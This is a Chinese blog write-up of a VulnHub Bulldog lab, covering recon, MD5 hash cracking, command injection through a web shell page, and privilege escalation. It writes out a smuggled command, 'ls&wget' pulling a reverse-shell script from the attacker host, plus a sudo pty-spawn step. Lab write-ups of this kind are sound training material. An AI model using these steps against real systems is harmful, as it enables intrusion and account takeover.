【vulnhub】---bulldog靶机

最新推荐文章于 2024-02-02 16:11:43 发布
最新推荐文章于 2024-02-02 16:11:43 发布
阅读量255 收藏 2
点赞数
分类专栏: vulnhub 文章标签: 安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43168364/article/details/106057600
版权

目录

一、实验环境
二、信息收集
三、渗透测试
  1、漏洞发现和利用
  2、提权
四、总结

一、实验环境

  • 靶机:bolldog靶机(192.168.1.105)
  • 攻击机:kali Linux(192.168.1.104)

二、信息收集

主机发现
在这里插入图片描述
或者用netdiscover也可以。命令:netdiscover -i eth0 -r 192.168.1.0/24
在这里插入图片描述
端口扫描,首先用masscan看看它开启了哪些端口,他的速度过快时貌似发现不了某些端口,可以多扫描几次。
在这里插入图片描述
使用nmap进行版本探测和操作系统识别
在这里插入图片描述
由于它开放了80端口,我们先进行目录扫描 dirb http://192.168.1.105
在这里插入图片描述
网站指纹信息识别(whatweb)
在这里插入图片描述

  • 经过信息收集我们得到了以下信息:
  • IP => 192.168.1.105
  • OS => Linux 3.2 - 4.9
  • Linux_kernel(内核) => 4
  • 23端口 => ssh服务
  • 80端口 => http服务–WSGIServer 0.1 (Python 2.7.12)
  • 8080端口 => http服务–WSGIServer 0.1 (Python 2.7.12)
  • 有用的web目录:
    http://192.168.1.105/admin/
    http://192.168.1.105/dev/
    http://192.168.1.105/robots.txt

三、渗透测试

1、漏洞发现和利用

首先尝试对23端口的ssh服务进行爆破
在这里插入图片描述 在这里插入图片描述
由于字典不够强大,爆破失败,我们尝试从web站点渗透。首先访问目标网站主页
在这里插入图片描述
再看看robots.txt文件看是否可以利用
在这里插入图片描述
被过滤了,无法利用。这里是一个登录界面。可以用bp尝试暴力破解,由于字典不够牛逼,暴力破解失败。
在这里插入图片描述
在这里插入图片描述
访问该页面的前提是要先在http://192.168.1.105/admin下登录成功。
在这里插入图片描述
我们接下来要首先想办法从admin下登录
在这里插入图片描述
我们查看该页面的源码这里有个目录访问试试看
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
没有任何有用的信息。我们再接着看刚才网页的源码。这里有邮箱和经过MD5加密的东西,我们猜测用户名可能是邮箱名,密码就是经过MD5加密的东西。对这些值进行解密。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
最后两个的MD5值解密成功,将其写入一个.txt文件
在这里插入图片描述
尝试进行登录,登录之后我们发现都无法登录。这里猜测用户名会不会是把@之后的东西东西去除,也就是nick和sarah。再次尝试进行登录。
在这里插入图片描述
登录成功,登录之后也没有什么可以利用的点。这时我们想到的了http://192.168.1.105/dev下的webshell,我们访问看看有什么新的发现。
在这里插入图片描述
我们发现这里有一个命令执行窗口,很nice看看是否有命令执行漏洞。
在这里插入图片描述
命令执行漏洞存在。写一个python的反弹shell脚本shell.py,把它放到kali的/var/www/html下。
在这里插入图片描述
在kali中开启apache服务
在这里插入图片描述
在靶机的web-shell中执行 ls&wget http://192.168.1.104/shell.py命令。
在这里插入图片描述
在这里插入图片描述
上传python反弹shell脚本成功,在kali端监听1234端口。
在这里插入图片描述
运行shell.py程序
在这里插入图片描述
连接成功,拿到shell。

在这里插入图片描述

2、提权

在这里插入图片描述
进入/home目录下查看有那些用户
在这里插入图片描述
查看bulldogadmin中的内容
在这里插入图片描述
我们发现了一个.hiddenadmindirectory隐藏文件,查看它里面的内容。发现里面有两个文件customPermissApp和note。
在这里插入图片描述
我们 cat note发现里面并没有有用的信息,而 cat customPermissionApp得到的内容又是乱码。这里可以用 strings命令
在这里插入图片描述
根据经验判断SUPERultimatePASSWORDyouCANTget可能是密码。然后使用python将临时的shell变为tty,语法: sudo python -c 'import pty;pty.spawn("/bin/bash")'
在这里插入图片描述
提权成功!!!

四、总结

  • masscan扫描的速度过快时会扫不出某些开放的端口,–rate的设置不要太大。
  • WSGIServer:WSGI是python语言所定义的Web服务器Web应用程序之间或框架之间的通用接口标准,WSGI是一座桥梁,桥梁的一端为服务器或网关,另一端为应用端或者框架端,WSGI的作用就是在协议之间进行转化。WSGI将web组件分成了三类:web服务器(WSGIServer)Web中间件(WSGIMiddleware)Web应用程序(WSGIApplication)WebServer接收HTTP请求,封装一系列环境变量,按照WSGI接口标准调用注册的WSGIApplication,最后将响应返回给客户端
  • X-Frame-Options:是一个HTTP标头,用来告诉浏览器这个网页是否可以放在iFrame内。
    • X-Frame-Options: DENY(不放入)
    • X-Frame-Options: SAMEORIGIN(告诉浏览器只有当架设iFrame的网站与发出X-Frame-Options的网站相同,才能显示发出X-Frame- Options网页的内容)
    • X-Frame-Options: ALLOW-FROM http://xxxx( 告诉浏览器这个网页只能放在http://xxxx网页架设的iFrame内)。
  • string命令:打印文件中可打印的字符。当cat命令不能有效的读取文件时可以使用它。
  • 当登录成功之后,要想到利用web-shell。
  • 注意一些文件夹的命名特殊的路径网页中的信息
  • MSF下search ssh_login 模块的使用。
  • subprocess.call():执行指定的命令,返回命令的执行状态,其功能类似于os.system(cmd)
  • os.dup2(fd,fd2):用于将一个文件描述符fd复制到另一个fd2。
通地塔
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub-Bulldog1 靶机渗透
Majula
02-01 571
WalkthroughDownloadDescriptionPen TestingScanningExploitationPrivilege EscalationSolution ISolution IIReview Download BULLDOG: 1 - VlunHub VM 镜像文件。 这里 VM 我导入配置失败,分配不了 IP,建议用 VirtualBox,因为靶机默认模式是桥接,攻击机也要设为桥接模式。 我是 VM 运行 Kali,VirtualBox 运行靶机,如果你是这种情况,为了更加直观,
kali渗透综合靶机(二)--bulldog靶机
W小哥
03-07 983
一、靶机下载 靶机下载地址:https://download.vulnhub.com/bulldog/bulldog.ova 二、bulldog靶机搭建 靶机: 将下载好的靶机环境,用VM VirtualBox导入即可使用,管理->导入虚拟电脑 设置网络模式,网卡选择仅主机模式 kali攻击机: 点开vmware中的虚拟选项编辑器中 点击更改设置,让vmware桥接至VirtualBox...
靶机实战(bulldog)
weixin_45605313的博客
05-28 335
bulldog实验环境实验过程信息收集1.主机发现2.端口扫描3.目录扫描4.web站指纹5.漏洞发现漏洞利用提权总结 实验环境 靶机:bulldog 测试机:win10 ,kali 实验过程 信息收集 1.主机发现 靶机ip:192.168.238.146 2.端口扫描 先用masscan进行快速全面的扫描 nmap扫描得到端口服务信息 3.目录扫描 访问80,web服务进行目录扫描 4.web站指纹 以python环境搭建web 5.漏洞发现 1.尝试ssh弱口令:利用msf,hydra等
靶机渗透【bulldog】
学信安技术 卫国家之门
11-04 4293
一. bulldog靶机安装 1. 下载bulldog 靶场地址:Bulldog - VulnHub (可自行下载) 百度网盘:bulldog 提取码:qrnf 2. 将下载好的靶机存放在想存放的地方,建议放在其他虚拟机相同的目录下 3. 打开VMware,左上角文件 - - 打开 - - 找到存放bulldog的位置 4. 开启bulldog(开启后无需进行其他操作) 二. bulldog靶机渗透 设备信息: kali(NAT)IP:192.168.110.140 bulldog(NAT)IP:
vuInhub靶场实战系列-bulldog-1
最新发布
06-03
vuInhub靶场实战系列-bulldog-1
BULLDOG-开源
05-27
【标题】"BULLDOG-开源"所涉及的知识点主要围绕着开源工作流解决方案Bulldog以及与其关联的J2EE容器和Tomcat展开。 首先,Bulldog作为一个开源项目,意味着它的源代码对公众开放,允许用户查看、使用、修改并分发...
atomic-bulldog-grid::office_building:基于CSS网格布局CSS(SCSS)网格,具有@supports后退到flexbox
02-05
原子牛头犬网格 :collision: :dog_face: CSS(SCSS)网格,基于具有@supportsCSS网格布局回退到flexbox... Atomic Bulldog是基于原子设计方法的Scss(Sass)样板。 它集成了Node KSS以自动生成实时样式指南/样式库。
British Bulldog Themes & New Tab-crx插件
03-16
安装扩展程序后,每次启动浏览器选项卡时,您将拥有一个新的British Bulldog。 我们的目标是为世界各地的人们带来出色的新标签。 让我们的团队为您提供新的屏幕标签,让您的生活栩栩如生。 每个新标签页都是真正的...
French Bulldog Themes & New Tab-crx插件
03-16
安装扩展程序后,每次启动浏览器选项卡时,您将拥有一个新的French Bulldog。 我们的目标是为世界各地的人们带来出色的新标签。 让我们的团队为您提供新的屏幕标签,让您的生活栩栩如生。 每个新标签页都是真正的...
靶机实战-bulldog1
滕财然的博客
01-19 951
bulldog1-靶机实战靶机实战:bulldog11、主机发现2、扫描端口3、web渗透(80端口)4、提权 靶机实战:bulldog1 先要知道对方的IP是否存活,也就是主机发现 1、主机发现 netdiscover -i etho -r IP/网段 属于主动 -i 指定网卡 -r 指定网段 找到目标靶机IP:192.168.232.134 也可以用nmap -sn 扫,看自己心情。...
Bulldog靶机-walkthrough
ins1ght的博客
09-05 1434
Bulldog靶机,一个CTF类型的靶机
vulnhub】--- bulldog2靶机
qq_43168364的博客
08-21 407
目录 一、实验环境 靶机:bulldog2靶机(192.168.1.102、192.168.1.105) 攻击机:kali Linux(192.168.1.104) 二、靶机设置 我们首先进行登录 我们发现登录进去之后靶机是没有IP地址的,我们看看它的网卡配置文件。 这里网卡设置的是dhcp,我们可以通过dhclient命令来获取IP。建议设置为桥接。 现在两个网卡就都有IP地址了。接下来就可以进行渗透了。 三、信息收集 首先用nmap进行主机发现,命令:nmap -sn 192.168.1.
靶机测试-bulldog
ximo的博客
02-27 356
测试步骤信息收集主机发现端口及其服务扫描目录扫描测试对应端口服务测试后台目录寻找漏洞:反弹shell因为知道网站的编程语言是python,所以可以通过python进行反弹shell:提权 信息收集 主机发现 kali IP地址查询,确认靶机存在网段 使用nmap进行主机发现: namp -sP 192.168.31.0/24 端口及其服务扫描 nmap -sV -O 192.168.31.181 发现开放了23,80,8080端口及其服务 访问其80及8080端口(因为此端口开放了http服
渗透靶机之BULLDOG
qq_43235703的博客
02-02 1125
靶机渗透之BULLDOG 渗透环境: 攻击机:kali(10.0.10.198) 靶机:vmbox(10.0.10.208) 连接模式:全部为桥接 探嗅目标 安装好我们的靶机之后开机,然后你的ip地址就出现在靶机界面上面,也省了我们用kali来扫 但是多少这达不到我们模拟实战的过程,真正的渗透谁会把地址摆着给你啊对不对,所以还是要动手用netdiscover来扫一波,直接扫出来然后上nmap扫端...
bulldog2--靶机渗透
weixin_44769042的博客
10-30 355
靶机记录--7 目录 分配ip 主机发现 端口扫描 服务版本,操作系统扫描 开始渗透 水平越权 垂直越权 反弹shell 尝试提权 得到flag 总结 分配ip 这个靶机的IP要重新分发(dhclient) 主机发现 端口扫描 这里扫到两个ip,但是mac地址相同,扫一个就行 服务版本,操作系统扫描 开始渗透 1> 来到主页,有登陆点,注册点 2> 来到登陆点,万能密码,弱口令,暴力破解走一波 3...
Vulnhub-Bulldog靶机实战
御七彩虹猫
03-24 1432
Vulnhub-Bulldog靶机实战
学习渗透日记4 靶机bulldog实战
qq_56902810的博客
04-26 205
bulldog靶机完整渗透版!
渗透测试实战2——bulldog1靶机入侵
浅浅的博客
04-25 970
一、实验环境 攻击机(Kali):192.168.247.160 靶机(bulldog1):192.168.247.148 二、实验步骤 (一)主动信息收集 1、主机发现 2、端口扫描 3、端口服务版本扫描 (二)Web渗透 http服务(80端口) 1、访问目标主机 没有发现什么有用信息。 2、网站指纹信息扫描(whatweb) ...
实现一个双向适配器实例,使得猫(Cat)可以学狗(Dog)叫,狗可以学猫抓老鼠。绘制相应类图并使用代码编程模拟。
04-01
以下是双向适配器类图和实现代码: ![adapter-pattern](https://user-images.githubusercontent.com/45758449/116464798-0e07c280-a89d-11eb-8b3e-7c3a88b9c7d9.png) ```python # Target interface class Cat: def catch_mice(self) -> str: pass # Adaptee interface class Dog: def bark(self) -> str: pass # Adaptee class Bulldog(Dog): def bark(self) -> str: return "Woof! Woof!" # Adapter class DogAdapter(Cat): def __init__(self, dog: Dog): self.dog = dog def catch_mice(self) -> str: return self.dog.bark() # Client code if __name__ == "__main__": bulldog = Bulldog() cat = Cat() adapter = DogAdapter(bulldog) print(adapter.catch_mice()) # Output: Woof! Woof! ``` 在上面的代码中,我们有一个Target接口 `Cat`,它定义了一个`catch_mice()`方法,表示猫抓老鼠。我们还有一个Adaptee接口`Dog`,它定义了一个`bark()`方法,表示狗叫。`Bulldog`是`Dog`接口的一个具体实现。 现在我们需要一个适配器类`DogAdapter`来使得猫可以学狗叫。它实现了`Cat`接口,并将`Dog`对象作为适配器构造函数的参数。在`catch_mice()`方法中,它调用`Dog`对象的`bark()`方法来模拟狗叫声。 在客户端代码中,我们创建了一个`Bulldog`对象和一个`Cat`对象。然后我们创建了一个`DogAdapter`对象,并将`Bulldog`对象传递给它。最后,我们通过适配器对象调用`catch_mice()`方法,并输出适配的结果。 这就是双向适配器模式的一个简单实现。当然,你可以根据自己的需求和场景来进行改进和扩展。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值